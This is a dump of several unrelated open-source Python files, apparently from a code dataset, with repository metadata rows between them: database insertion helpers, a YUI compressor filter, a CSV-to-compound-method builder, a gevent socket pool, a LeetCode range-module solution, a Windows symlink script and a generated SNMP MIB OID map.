logging.error('error updating articleincount field for ids: ("%s"): %s (%s)'
% (",".join([str(id) for id in target_article_ids]), str(e.args[1]), str(e.args[0])))
if retry:
logging.error('error updating articleincount field %d retries DEADLOCK when updating ids: ("%s")'
% (retryCount, ",".join([str(id) for id in target_article_ids])))
def insert_disambiguation(self, string, target_article_name):
"""saves a disambiguation to the database
@param string the disambiguation string used for the linked entity
@param target_article_name the name of the article the disambiguation stands for
"""
target_article_id = self._resolve_title(target_article_name)
if target_article_id == None:
logging.error('Could not resolve target article "%s" for link from source article'
% (target_article_name.encode('ascii', 'ignore')))
else:
try:
self._cursor.execute('INSERT INTO disambiguations(string, target_article_id, occurrences) VALUES(%s, %s, 1) ON DUPLICATE KEY UPDATE occurrences=occurrences+1;',
(string, target_article_id))
except MySQLdb.Error, e:
logging.error('error saving disambiguation "%s" --> %s (%d): %s (%d)'
% (string.encode('ascii', 'ignore'), target_article_name.encode('ascii', 'ignore'), target_article_id, e.args[1], e.args[0]))
def insert_ngrams(self, ngrams):
"""inserts ngrams into the database
@param ngrams a list of ngrams where each ngram is a tuple containing the string,
and a zero or one indicating whether it was used as a link
"""
try:
self._cursor.executemany('INSERT INTO ngrams(string, occurrences, as_link) VALUES(LOWER(%s), 1, %s) ON DUPLICATE KEY UPDATE occurrences=occurrences+1, as_link=as_link+VALUES(as_link);',
ngrams)
except MySQLdb.Error, e:
logging.error('error saving ngrams: %s (%d)' % (e.args[1], e.args[0]))
def commit(self):
'''commits the changes
'''
self._db_connection.commit()
def reset_cache(self):
"""resets the internal cache and thus prevents it from growing too big
"""
self._article_id_cache = {}
def _resolve_title(self, title):
"""resolves an article and returns its id
@param title the title of the article
"""
if title in self._article_id_cache:
return self._article_id_cache[title]
try:
self._cursor.execute('SELECT id FROM articles WHERE title=%s;', (title,))
row = self._cursor.fetchone()
if row == None:
self._cursor.execute('SELECT id FROM articles WHERE title=(SELECT target_article_name FROM redirects WHERE source_article_name=%s);',
(title,))
row = self._cursor.fetchone()
if row == None:
self._article_id_cache[title] = None
else:
self._article_id_cache[title] = row[0]
except MySQLdb.Error, e:
logging.error('error resolving article "%s": %s (%d)'
% (title.encode('ascii', 'ignore'), e.args[1], e.args[0]))
return self._article_id_cache[title]
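# A hedged usage sketch (illustrative only; the connection parameters are
# placeholders and the articles/redirects/links tables are assumed to exist):
#
#     connection = MySQLdb.connect(host='localhost', user='wsd', passwd='...', db='wsd')
#     view = MySQLBuildView(connection)
#     view.insert_article(1, u'Python (programming language)')
#     view.insert_redirect(u'Python language', u'Python (programming language)')
#     view.insert_link(2, u'Python language')
#     view.commit()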
| mit | -3,987,502,628,156,108,000 | 42.286585 | 197 | 0.579377 | false |
bancek/egradebook | src/lib/compressor/filters/yui.py | 1 | 1339 | from subprocess import Popen, PIPE
from compressor.conf import settings
from compressor.filters import FilterBase, FilterError
from compressor.utils import cmd_split
class YUICompressorFilter(FilterBase):
def output(self, **kwargs):
arguments = ''
if self.type == 'js':
arguments = settings.YUI_JS_ARGUMENTS
if self.type == 'css':
arguments = settings.YUI_CSS_ARGUMENTS
command = '%s --type=%s %s' % (settings.YUI_BINARY, self.type, arguments)
if self.verbose:
command += ' --verbose'
try:
p = Popen(cmd_split(command), stdin=PIPE, stdout=PIPE, stderr=PIPE)
filtered, err = p.communicate(self.content)
except IOError, e:
raise FilterError(e)
if p.wait() != 0:
if not err:
err = 'Unable to apply YUI Compressor filter'
raise FilterError(err)
if self.verbose:
print err
return filtered
class YUICSSFilter(YUICompressorFilter):
def __init__(self, *args, **kwargs):
super(YUICSSFilter, self).__init__(*args, **kwargs)
self.type = 'css'
class YUIJSFilter(YUICompressorFilter):
def __init__(self, *args, **kwargs):
super(YUIJSFilter, self).__init__(*args, **kwargs)
self.type = 'js'
| gpl-3.0 | 2,404,042,129,496,164,400 | 26.895833 | 81 | 0.592233 | false |
whereskenneth/Dwarfsquad | dwarfsquad/lib/build/from_export/build_compound_methods.py | 1 | 6738 | from dwarfsquad.lib.build.from_export.helpers import build_reference_map
from dwarfsquad.lib.utils import to_stderr
from dwarfsquad.model.Calibration import Calibration
from dwarfsquad.model.ChromatogramMethod import ChromatogramMethod
from dwarfsquad.model.CompoundMethod import CompoundMethod
from dwarfsquad.model.PeakIntegration import PeakIntegration
from dwarfsquad.model.ReductionMethod import ReductionMethod
from dwarfsquad.model.RetentionTime import RetentionTime
from dwarfsquad.model.Smoothing import Smoothing
from dwarfsquad.model.Threshold import Threshold
def build_compound_methods(compounds_csv):
compound_methods = []
unique_compound_choromatograms = set()
for row in compounds_csv:
try:
compound_method = get_compound_method(compound_methods, row)
chromatogram_method = get_chromatogram_method(row)
compound_method.chromatogram_methods.append(chromatogram_method)
compound_methods.insert(compound_method.view_order, compound_method)
unique_compound_chromatogram_name = compound_method.name + " - " + chromatogram_method.name
if unique_compound_chromatogram_name in unique_compound_choromatograms:
raise Exception("Assay already contains a compound/chromatogram combo of: " +
unique_compound_chromatogram_name)
else:
unique_compound_choromatograms.add(unique_compound_chromatogram_name)
except Exception as e:
for k, v in row.items():
to_stderr(k + ": " + v)
raise e
reference_map = build_reference_map(compound_methods)
return resolve_references(compound_methods, reference_map)
def resolve_references(compound_methods, reference_map):
resolved_cms = []
for cm in compound_methods:
cm.calibration.normalizers = [reference_map[n] for n in cm.calibration.normalizers if n]
cm.calibration.responses = [reference_map[r] for r in cm.calibration.responses if r]
resolved_ch_ms = []
for ch_m in cm.chromatogram_methods:
try:
reference = ch_m.peak_integration.retention_time.reference
ch_m.peak_integration.retention_time.reference = reference_map[reference]
except KeyError:
pass
resolved_ch_ms.append(ch_m)
cm.chromatogram_methods = resolved_ch_ms
resolved_cms.append(cm)
return resolved_cms
def get_chromatogram_method(row):
chromatogram_method = ChromatogramMethod({})
chromatogram_method.set_peak_integration(get_peak_integration(row))
chromatogram_method.set_reduction_method(get_reduction_method(row))
chromatogram_method.set_name(row.get('chromatogram_name'))
return chromatogram_method
def get_reduction_method(row):
reduction_method = ReductionMethod({})
reduction_method.set_activation_energy(row.get('activation_energy'))
reduction_method.set_combine_ions(row.get('combine_ions'))
reduction_method.set_lower_precursor_mass(row.get('lower_precursor_mass'))
reduction_method.set_upper_precursor_mass(row.get('upper_precursor_mass'))
reduction_method.set_lower_product_mass(row.get('lower_product_mass'))
reduction_method.set_upper_product_mass(row.get('upper_product_mass'))
reduction_method.set_polarity(row.get('polarity'))
return reduction_method
def get_peak_integration(row):
peak_integration = PeakIntegration({})
peak_integration.set_retention_time(get_retention_time(row))
peak_integration.set_threshold(get_threshold(row))
peak_integration.set_smoothing(get_smoothing(row))
peak_integration.set_prioritized_peak_models(get_prioritized_peak_models(row))
return peak_integration
def get_prioritized_peak_models(row):
return str(row.get('prioritized_peak_models')).split(';')
def get_smoothing(row):
smoothing = Smoothing({})
smoothing.set_fixed(row.get('fixed'))
smoothing.set_max(row.get('max'))
smoothing.set_min(row.get('min'))
smoothing.set_optimal_enabled(row.get('optimal_enabled'))
smoothing.set_start(row.get('start'))
return smoothing
def get_threshold(row):
threshold = Threshold({})
threshold.set_peak_probability(row.get('peak_probability'))
threshold.set_absolute_area(row.get('absolute_area'))
threshold.set_absolute_height(row.get('absolute_height'))
threshold.set_first_derivative(row.get('first_derivative'))
threshold.set_second_derivative(row.get('second_derivative'))
threshold.set_min_merge_difference(row.get('min_merge_difference'))
threshold.set_relative_area(row.get('relative_area'))
threshold.set_relative_height(row.get('relative_height'))
threshold.set_saturation(row.get('saturation'))
threshold.set_signal_to_noise(row.get('signal_to_noise'))
threshold.set_relative_low_std_area(row.get('relative_low_std_area'))
threshold.set_relative_low_std_height(row.get('relative_low_std_height'))
return threshold
def get_retention_time(row):
retention_time = RetentionTime({})
retention_time.set_bias(row.get('bias'))
retention_time.set_expected(row.get('expected'))
retention_time.set_lower_tolerance(row.get('lower_tolerance'))
retention_time.set_upper_tolerance(row.get('upper_tolerance'))
retention_time.set_reference(row.get('reference'))
retention_time.set_reference_type_source(row.get('reference_type_source'))
retention_time.set_upper_trace_width(row.get('upper_trace_width'))
retention_time.set_lower_trace_width(row.get('lower_trace_width'))
retention_time.set_window_width(row.get('window_width'))
retention_time.set_estimation_width(row.get('estimation_width'))
retention_time.set_window_multiplier(row.get('window_multiplier'))
return retention_time
def get_calibration(row):
calibration = Calibration({})
calibration.set_degree(row.get('degree'))
calibration.set_enabled(row.get('enabled'))
calibration.set_origin(row.get('origin'))
calibration.set_weighting(row.get('weighting'))
try:
calibration.set_normalizers(str(row.get('normalizers')).split(';'))
except ValueError:
calibration.set_normalizers([])
try:
calibration.set_responses(str(row.get('responses')).split(';'))
except ValueError:
calibration.set_responses([])
return calibration
def get_compound_method(cms, row):
for index, cm in enumerate(cms):
if row.get('compound_name') == cm.name:
return cms.pop(index)
cm = CompoundMethod({})
cm.set_name(row.get('compound_name'))
cm.set_view_order(row.get('view_order'))
cm.set_calibration(get_calibration(row))
return cm
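# A hedged usage sketch (illustrative only; assumes a CSV file whose header row
# matches the column names read above, e.g. compound_name, chromatogram_name):
#
#     import csv
#     with open('compounds.csv') as f:
#         compound_methods = build_compound_methods(csv.DictReader(f))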
| mit | -6,402,530,371,406,678,000 | 37.502857 | 103 | 0.706886 | false |
paypal/support | support/socket_pool.py | 1 | 6787 | '''
Protocol-agnostic socket pooler.
This code is both extensively tested and hard to test.
Modify with caution :-)
"There are two ways of constructing a software design:
One way is to make it so simple that there are obviously no deficiencies,
and the other way is to make it so complicated that there are no obvious deficiencies."
-CAR Hoare, 1980 Turing Award lecture
In particular: it is tempting to attempt to auto-reconnect and re-try at this layer.
This is not possible to do correctly here, however, since only the protocol-aware clients
know what a retry entails (e.g. SSL handshake, resetting protocol state).
'''
import time
import select
import socket
import gevent
import ll
ml = ll.LLogger()
# TODO: free_socks_by_addr using sets instead of lists could probably improve
# performance of cull
class SocketPool(object):
def __init__(self, timeout=0.25, max_sockets=800):
import async # breaks circular dependency
self.timeout = timeout
self.free_socks_by_addr = {}
self.sock_idle_times = {}
self.killsock = async.killsock
self.total_sockets = 0
self.max_socks_by_addr = {} # maximum sockets on an address-by-address basis
self.default_max_socks_per_addr = 50
        self.max_sockets = max_sockets  # honor the constructor argument instead of hard-coding 800
def acquire(self, addr):
        # return a free socket, if one is available; else None
try:
self.cull()
except Exception as e: # never bother caller with cull problems
ml.ld("Exception from cull: {0!r}", e)
socks = self.free_socks_by_addr.get(addr)
if socks:
sock = socks.pop()
del self.sock_idle_times[sock]
try: # sock.fileno() will throw if EBADF
ml.ld("Acquiring sock {0}/FD {1}", str(id(sock)), str(sock.fileno()))
except:
pass
return sock
return None
def release(self, sock):
#this is also a way of "registering" a socket with the pool
#basically, this says "I'm done with this socket, make it available for anyone else"
try: # sock.fileno() will throw if EBADF
ml.ld("Releasing sock {0} /FD {1}", str(id(sock)), str(sock.fileno()))
except:
pass
try:
if select.select([sock], [], [], 0)[0]:
self.killsock(sock)
return #TODO: raise exception when handed messed up socket?
#socket is readable means one of two things:
#1- left in a bad state (e.g. more data waiting -- protocol state is messed up)
#2- socket closed by remote (in which case read will return empty string)
except:
return #if socket was closed, select will raise socket.error('Bad file descriptor')
addr = sock.getpeername()
addr_socks = self.free_socks_by_addr.setdefault(addr, [])
self.total_sockets += 1
self.sock_idle_times[sock] = time.time()
addr_socks.append(sock)
self.reduce_addr_size(addr, self.max_socks_by_addr.get(addr, self.default_max_socks_per_addr))
self.reduce_size(self.max_sockets)
def reduce_size(self, size):
'''
reduce to the specified size by killing the oldest sockets
        returns a list of greenlets that can be joined on to wait for the culled sockets to close (None if nothing was culled)
'''
if self.total_sockets <= size:
return
num_culling = self.total_sockets - size
culled = sorted([(v, k) for k,v in self.sock_idle_times.iteritems()])[-num_culling:]
self.total_sockets -= num_culling
return [self._remove_sock(e[1]) for e in culled]
def reduce_addr_size(self, addr, size):
'''
reduce the number of sockets pooled on the specified address to size
        returns a list of greenlets that can be joined on to wait for the culled sockets to close (None if nothing was culled)
'''
addr_socks = self.free_socks_by_addr.get(addr, [])
if len(addr_socks) <= size:
return
num_culling = len(addr_socks) - size
culled = sorted([(self.sock_idle_times[e], e) for e in addr_socks])[-num_culling:]
self.total_sockets -= num_culling
return [self._remove_sock(e[1]) for e in culled]
def _remove_sock(self, sock):
self.free_socks_by_addr[sock.getpeername()].remove(sock)
del self.sock_idle_times[sock]
return gevent.spawn(self.killsock, sock)
def socks_pooled_for_addr(self, addr):
return len(self.free_socks_by_addr.get(addr, ()))
def cull(self):
#cull sockets which are in a bad state
culled = []
self.total_sockets = 0
#sort the living from the soon-to-be-dead
for addr in self.free_socks_by_addr:
live = []
# STEP 1 - CULL IDLE SOCKETS
for sock in self.free_socks_by_addr[addr]:
# in case the socket does not have an entry in sock_idle_times,
# assume the socket is very old and cull
if time.time() - self.sock_idle_times.get(sock, 0) > self.timeout:
try:
ml.ld("Going to Close sock {{{0}}}/FD {1}",
id(sock), sock.fileno())
except:
pass
culled.append(sock)
else:
try: # check that the underlying fileno still exists
sock.fileno()
live.append(sock)
except socket.error:
pass # if no fileno, the socket is dead and no need to close it
# STEP 2 - CULL READABLE SOCKETS
if live: # (if live is [], select.select() would error)
readable = set(select.select(live, [], [], 0)[0])
# if a socket is readable that means one of two bad things:
# 1- the socket has been closed (and sock.recv() would return '')
# 2- the server has sent some data which no client has claimed
# (which will remain in the recv buffer and mess up the next client)
live = [s for s in live if s not in readable]
culled.extend(readable)
self.free_socks_by_addr[addr] = live
self.total_sockets += len(live)
# shutdown all the culled sockets
for sock in culled:
del self.sock_idle_times[sock]
gevent.spawn(self.killsock, sock)
def __repr__(self):
return "<%s nsocks=%r/%r naddrs=%r>" % (self.__class__.__name__,
self.total_sockets,
self.max_sockets,
len(self.free_socks_by_addr))
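# A hedged usage sketch (illustrative only; the address is a placeholder and the
# protocol-aware caller is responsible for creating a socket on a pool miss):
#
#     pool = SocketPool(timeout=0.25, max_sockets=800)
#     addr = ('example.com', 80)
#     sock = pool.acquire(addr)
#     if sock is None:
#         sock = socket.create_connection(addr)
#     # ... speak the protocol on sock, then hand it back ...
#     pool.release(sock)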
| bsd-3-clause | 3,623,353,880,487,837,700 | 41.685535 | 102 | 0.573155 | false |
JulyKikuAkita/PythonPrac | cs15211/RangeModule.py | 1 | 7564 | __source__ = 'https://leetcode.com/problems/range-module/'
# Time: O(logK) to O(K)
# Space: O(A+R), the space used by ranges.
#
# Description: Leetcode # 715. Range Module
#
# A Range Module is a module that tracks ranges of numbers.
# Your task is to design and implement the following interfaces in an efficient manner.
#
# addRange(int left, int right) Adds the half-open interval [left, right),
# tracking every real number in that interval.
# Adding an interval that partially overlaps with currently tracked numbers
# should add any numbers in the interval [left, right) that are not already tracked.
#
# queryRange(int left, int right) Returns true if and only if every real number in the interval
# [left, right) is currently being tracked.
#
# removeRange(int left, int right) Stops tracking every real number currently being tracked
# in the interval [left, right).
#
# Example 1:
#
# addRange(10, 20): null
# removeRange(14, 16): null
# queryRange(10, 14): true (Every number in [10, 14) is being tracked)
# queryRange(13, 15): false (Numbers like 14, 14.03, 14.17 in [13, 15) are not being tracked)
# queryRange(16, 17): true (The number 16 in [16, 17) is still being tracked,
# despite the remove operation)
#
# Note:
# A half open interval [left, right) denotes all real numbers left <= x < right.
# 0 < left < right < 10^9 in all calls to addRange, queryRange, removeRange.
# The total number of calls to addRange in a single test case is at most 1000.
# The total number of calls to queryRange in a single test case is at most 5000.
# The total number of calls to removeRange in a single test case is at most 1000.
#
import unittest
import bisect
# 308ms 58.44%
class RangeModule(object):
def __init__(self):
self.ranges = []
def _bounds(self, left, right):
i, j = 0, len(self.ranges) - 1
for d in (100, 10, 1):
while i + d - 1 < len(self.ranges) and self.ranges[i+d-1][1] < left:
i += d
while j >= d - 1 and self.ranges[j-d+1][0] > right:
j -= d
return i, j
def addRange(self, left, right):
i, j = self._bounds(left, right)
if i <= j:
left = min(left, self.ranges[i][0])
right = max(right, self.ranges[j][1])
self.ranges[i:j+1] = [(left, right)]
def queryRange(self, left, right):
i = bisect.bisect_left(self.ranges, (left, float('inf')))
if i: i -= 1
return (bool(self.ranges) and
self.ranges[i][0] <= left and
right <= self.ranges[i][1])
def removeRange(self, left, right):
i, j = self._bounds(left, right)
merge = []
for k in xrange(i, j+1):
if self.ranges[k][0] < left:
merge.append((self.ranges[k][0], left))
if right < self.ranges[k][1]:
merge.append((right, self.ranges[k][1]))
self.ranges[i:j+1] = merge
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
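    # Illustrative check that mirrors Example 1 from the problem description above.
    def test_example_1(self):
        rm = RangeModule()
        rm.addRange(10, 20)
        rm.removeRange(14, 16)
        self.assertTrue(rm.queryRange(10, 14))
        self.assertFalse(rm.queryRange(13, 15))
        self.assertTrue(rm.queryRange(16, 17))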
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought: https://leetcode.com/problems/range-module/solution/
#
Approach #1: Maintain Sorted Disjoint Intervals [Accepted]
Complexity Analysis
Time Complexity: Let K be the number of elements in ranges.
addRange and removeRange operations have O(K) complexity;
queryRange has O(logK) complexity.
Because addRange and removeRange add at most 1 interval at a time, you can bound these further.
For example, if there are A addRange, R removeRange, and Q queryRange operations respectively,
we can express the total complexity as O((A+R)^2 + Qlog(A+R)).
Space Complexity: O(A+R), the space used by ranges.
# 121ms 89.92%
class RangeModule {
TreeSet<Interval> ranges;
public RangeModule() {
ranges = new TreeSet();
}
public void addRange(int left, int right) {
Iterator<Interval> itr = ranges.tailSet(new Interval(0, left - 1)).iterator();
while (itr.hasNext()) {
Interval iv = itr.next();
if (right < iv.left) break;
left = Math.min(left, iv.left);
right = Math.max(right, iv.right);
itr.remove();
}
ranges.add(new Interval(left, right));
}
public boolean queryRange(int left, int right) {
Interval iv = ranges.higher(new Interval(0, left));
return (iv != null && iv.left <= left && right <= iv.right);
}
public void removeRange(int left, int right) {
Iterator<Interval> itr = ranges.tailSet(new Interval(0, left)).iterator();
ArrayList<Interval> todo = new ArrayList();
while (itr.hasNext()) {
Interval iv = itr.next();
if (right < iv.left) break;
if (iv.left < left) todo.add(new Interval(iv.left, left));
if (right < iv.right) todo.add(new Interval(right, iv.right));
itr.remove();
}
for (Interval iv: todo) ranges.add(iv);
}
}
class Interval implements Comparable<Interval>{
int left;
int right;
public Interval(int left, int right){
this.left = left;
this.right = right;
}
public int compareTo(Interval that){
if (this.right == that.right) return this.left - that.left;
return this.right - that.right;
}
}
/**
* Your RangeModule object will be instantiated and called as such:
* RangeModule obj = new RangeModule();
* obj.addRange(left,right);
* boolean param_2 = obj.queryRange(left,right);
* obj.removeRange(left,right);
*/
# 136ms 78.23%
class RangeModule {
List<int[]> ranges = new ArrayList<int[]>();
public RangeModule() {
ranges.add(new int[]{-1, -1});
}
public void addRange(int left, int right) {
int l = searchFloor(left);
int r = searchFloor(right);
int[] vl = ranges.get(l);
int[] vr = ranges.get(r);
if (vr[1] < left) {
ranges.add(r + 1, new int[]{left, right});
} else {
for (int k = 0; k < r - l; k++) ranges.remove(l + 1);
if (vl[1] < left) {
ranges.add(l + 1, new int[]{left, Math.max(right, vr[1])});
} else {
ranges.remove(l);
ranges.add(l, new int[] {vl[0], Math.max(right, vr[1])});
}
}
}
public boolean queryRange(int left, int right) {
int l = searchFloor(left);
int[] r = ranges.get(l);
return (r[1] >= right);
}
public void removeRange(int left, int right) {
int l = searchFloor(left);
int r = searchFloor(right);
int[] vl = ranges.get(l);
int[] vr = ranges.get(r);
if (vr[1] <= left) return;
for (int k = 0; k < r - l; k++) ranges.remove(l + 1);
if (vr[1] > right) {
ranges.add(l + 1, new int[]{right, vr[1]});
}
if (vl[1] > left) {
ranges.remove(l);
if (vl[0] < left) {
ranges.add(l, new int[]{vl[0], left});
}
}
}
// search nearest internal starts at or before key and return the index
private int searchFloor(int key) {
int l = 0, h = ranges.size();
while (l + 1 < h) {
int m = l + (h - l) / 2;
int v = ranges.get(m)[0];
if (v < key) {
l = m;
} else if (v == key) {
l = m;
break;
} else {
h = m;
}
}
return l;
}
}
'''
| apache-2.0 | 7,008,019,913,116,863,000 | 32.321586 | 105 | 0.569672 | false |
jthrun/sdl_android | baseAndroid/make_symbolic_links.py | 1 | 2232 | import os
import pathlib
from pathlib import Path
import re
def has_admin():
if os.name == 'nt':
try:
# only windows users with admin privileges can read the C:\windows\temp
temp = os.listdir(os.sep.join([os.environ.get('SystemRoot', 'C:\\windows'), 'temp']))
except:
return os.environ['USERNAME'],False
else:
return os.environ['USERNAME'],True
else:
if 'SUDO_USER' in os.environ and os.geteuid() == 0:
return os.environ['SUDO_USER'],True
else:
return os.environ['USERNAME'],False
print('Script Start')
isAdmin = has_admin()
print('Running As Admin - ', isAdmin[1])
if not isAdmin[1]:
print('Can\'t run without admin privileges')
exit()
pathlist = Path('src/').glob('**/*')
# Delete the old directory
os.system('echo y | rmdir windows /s')
for path in pathlist:
path_in_str = str(path)
if os.path.isfile(path):
# check if it's a link to a file or folder
source_link_str = path_in_str
source_link_str = '..\\base\\' + source_link_str
# Remove the root folder for the actual link
print(source_link_str)
testDest = 'windows\\' + path_in_str
directory = pathlib.Path(testDest).parent
print(str(directory))
prefixDir = (re.sub(r"\\+[^\\]*", r"\\..", str(directory))+'\\..\\')[8:] # 8 to remove windows/
# Change all the directory paths into .. so that it will properly move up a folder.
os.system('mkdir %s' % directory)
os.system('icacls %s /grant Everyone:(f)' % directory)
        # Each directory level in the destination corresponds to one ..\ that has to be prepended to the link target
if path_in_str.endswith('.java'):
print('Java file link found')
command = 'mklink "%s" "%s%s"' % (testDest, prefixDir, source_link_str)
print('Performing command %s' % command)
os.system(command)
else:
print('Directory link found')
command = 'mklink /D "%s" "%s%s"' % (testDest, prefixDir, source_link_str)
print('Performing command %s' % command)
os.system(command)
print('Script Ends')
| bsd-3-clause | -4,495,510,196,234,252,000 | 31.347826 | 112 | 0.584229 | false |
xiangke/pycopia | mibs/pycopia/mibs/DOCS_IETF_QOS_MIB_OID.py | 1 | 11335 | # python
# This file is generated by a program (mib2py).
import DOCS_IETF_QOS_MIB
OIDMAP = {
'1.3.6.1.2.1.127': DOCS_IETF_QOS_MIB.docsIetfQosMIB,
'1.3.6.1.2.1.127.0': DOCS_IETF_QOS_MIB.docsIetfQosNotifications,
'1.3.6.1.2.1.127.1': DOCS_IETF_QOS_MIB.docsIetfQosMIBObjects,
'1.3.6.1.2.1.127.2': DOCS_IETF_QOS_MIB.docsIetfQosConformance,
'1.3.6.1.2.1.127.2.1': DOCS_IETF_QOS_MIB.docsIetfQosGroups,
'1.3.6.1.2.1.127.2.2': DOCS_IETF_QOS_MIB.docsIetfQosCompliances,
'1.3.6.1.2.1.127.1.1.1.1': DOCS_IETF_QOS_MIB.docsIetfQosPktClassId,
'1.3.6.1.2.1.127.1.1.1.2': DOCS_IETF_QOS_MIB.docsIetfQosPktClassDirection,
'1.3.6.1.2.1.127.1.1.1.3': DOCS_IETF_QOS_MIB.docsIetfQosPktClassPriority,
'1.3.6.1.2.1.127.1.1.1.4': DOCS_IETF_QOS_MIB.docsIetfQosPktClassIpTosLow,
'1.3.6.1.2.1.127.1.1.1.5': DOCS_IETF_QOS_MIB.docsIetfQosPktClassIpTosHigh,
'1.3.6.1.2.1.127.1.1.1.6': DOCS_IETF_QOS_MIB.docsIetfQosPktClassIpTosMask,
'1.3.6.1.2.1.127.1.1.1.7': DOCS_IETF_QOS_MIB.docsIetfQosPktClassIpProtocol,
'1.3.6.1.2.1.127.1.1.1.8': DOCS_IETF_QOS_MIB.docsIetfQosPktClassInetAddressType,
'1.3.6.1.2.1.127.1.1.1.9': DOCS_IETF_QOS_MIB.docsIetfQosPktClassInetSourceAddr,
'1.3.6.1.2.1.127.1.1.1.10': DOCS_IETF_QOS_MIB.docsIetfQosPktClassInetSourceMask,
'1.3.6.1.2.1.127.1.1.1.11': DOCS_IETF_QOS_MIB.docsIetfQosPktClassInetDestAddr,
'1.3.6.1.2.1.127.1.1.1.12': DOCS_IETF_QOS_MIB.docsIetfQosPktClassInetDestMask,
'1.3.6.1.2.1.127.1.1.1.13': DOCS_IETF_QOS_MIB.docsIetfQosPktClassSourcePortStart,
'1.3.6.1.2.1.127.1.1.1.14': DOCS_IETF_QOS_MIB.docsIetfQosPktClassSourcePortEnd,
'1.3.6.1.2.1.127.1.1.1.15': DOCS_IETF_QOS_MIB.docsIetfQosPktClassDestPortStart,
'1.3.6.1.2.1.127.1.1.1.16': DOCS_IETF_QOS_MIB.docsIetfQosPktClassDestPortEnd,
'1.3.6.1.2.1.127.1.1.1.17': DOCS_IETF_QOS_MIB.docsIetfQosPktClassDestMacAddr,
'1.3.6.1.2.1.127.1.1.1.18': DOCS_IETF_QOS_MIB.docsIetfQosPktClassDestMacMask,
'1.3.6.1.2.1.127.1.1.1.19': DOCS_IETF_QOS_MIB.docsIetfQosPktClassSourceMacAddr,
'1.3.6.1.2.1.127.1.1.1.20': DOCS_IETF_QOS_MIB.docsIetfQosPktClassEnetProtocolType,
'1.3.6.1.2.1.127.1.1.1.21': DOCS_IETF_QOS_MIB.docsIetfQosPktClassEnetProtocol,
'1.3.6.1.2.1.127.1.1.1.22': DOCS_IETF_QOS_MIB.docsIetfQosPktClassUserPriLow,
'1.3.6.1.2.1.127.1.1.1.23': DOCS_IETF_QOS_MIB.docsIetfQosPktClassUserPriHigh,
'1.3.6.1.2.1.127.1.1.1.24': DOCS_IETF_QOS_MIB.docsIetfQosPktClassVlanId,
'1.3.6.1.2.1.127.1.1.1.25': DOCS_IETF_QOS_MIB.docsIetfQosPktClassStateActive,
'1.3.6.1.2.1.127.1.1.1.26': DOCS_IETF_QOS_MIB.docsIetfQosPktClassPkts,
'1.3.6.1.2.1.127.1.1.1.27': DOCS_IETF_QOS_MIB.docsIetfQosPktClassBitMap,
'1.3.6.1.2.1.127.1.2.1.1': DOCS_IETF_QOS_MIB.docsIetfQosParamSetServiceClassName,
'1.3.6.1.2.1.127.1.2.1.2': DOCS_IETF_QOS_MIB.docsIetfQosParamSetPriority,
'1.3.6.1.2.1.127.1.2.1.3': DOCS_IETF_QOS_MIB.docsIetfQosParamSetMaxTrafficRate,
'1.3.6.1.2.1.127.1.2.1.4': DOCS_IETF_QOS_MIB.docsIetfQosParamSetMaxTrafficBurst,
'1.3.6.1.2.1.127.1.2.1.5': DOCS_IETF_QOS_MIB.docsIetfQosParamSetMinReservedRate,
'1.3.6.1.2.1.127.1.2.1.6': DOCS_IETF_QOS_MIB.docsIetfQosParamSetMinReservedPkt,
'1.3.6.1.2.1.127.1.2.1.7': DOCS_IETF_QOS_MIB.docsIetfQosParamSetActiveTimeout,
'1.3.6.1.2.1.127.1.2.1.8': DOCS_IETF_QOS_MIB.docsIetfQosParamSetAdmittedTimeout,
'1.3.6.1.2.1.127.1.2.1.9': DOCS_IETF_QOS_MIB.docsIetfQosParamSetMaxConcatBurst,
'1.3.6.1.2.1.127.1.2.1.10': DOCS_IETF_QOS_MIB.docsIetfQosParamSetSchedulingType,
'1.3.6.1.2.1.127.1.2.1.11': DOCS_IETF_QOS_MIB.docsIetfQosParamSetNomPollInterval,
'1.3.6.1.2.1.127.1.2.1.12': DOCS_IETF_QOS_MIB.docsIetfQosParamSetTolPollJitter,
'1.3.6.1.2.1.127.1.2.1.13': DOCS_IETF_QOS_MIB.docsIetfQosParamSetUnsolicitGrantSize,
'1.3.6.1.2.1.127.1.2.1.14': DOCS_IETF_QOS_MIB.docsIetfQosParamSetNomGrantInterval,
'1.3.6.1.2.1.127.1.2.1.15': DOCS_IETF_QOS_MIB.docsIetfQosParamSetTolGrantJitter,
'1.3.6.1.2.1.127.1.2.1.16': DOCS_IETF_QOS_MIB.docsIetfQosParamSetGrantsPerInterval,
'1.3.6.1.2.1.127.1.2.1.17': DOCS_IETF_QOS_MIB.docsIetfQosParamSetTosAndMask,
'1.3.6.1.2.1.127.1.2.1.18': DOCS_IETF_QOS_MIB.docsIetfQosParamSetTosOrMask,
'1.3.6.1.2.1.127.1.2.1.19': DOCS_IETF_QOS_MIB.docsIetfQosParamSetMaxLatency,
'1.3.6.1.2.1.127.1.2.1.20': DOCS_IETF_QOS_MIB.docsIetfQosParamSetType,
'1.3.6.1.2.1.127.1.2.1.21': DOCS_IETF_QOS_MIB.docsIetfQosParamSetRequestPolicyOct,
'1.3.6.1.2.1.127.1.2.1.22': DOCS_IETF_QOS_MIB.docsIetfQosParamSetBitMap,
'1.3.6.1.2.1.127.1.3.1.1': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowId,
'1.3.6.1.2.1.127.1.3.1.2': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowSID,
'1.3.6.1.2.1.127.1.3.1.3': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowDirection,
'1.3.6.1.2.1.127.1.3.1.4': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowPrimary,
'1.3.6.1.2.1.127.1.4.1.1': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowPkts,
'1.3.6.1.2.1.127.1.4.1.2': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowOctets,
'1.3.6.1.2.1.127.1.4.1.3': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowTimeCreated,
'1.3.6.1.2.1.127.1.4.1.4': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowTimeActive,
'1.3.6.1.2.1.127.1.4.1.5': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowPHSUnknowns,
'1.3.6.1.2.1.127.1.4.1.6': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowPolicedDropPkts,
'1.3.6.1.2.1.127.1.4.1.7': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowPolicedDelayPkts,
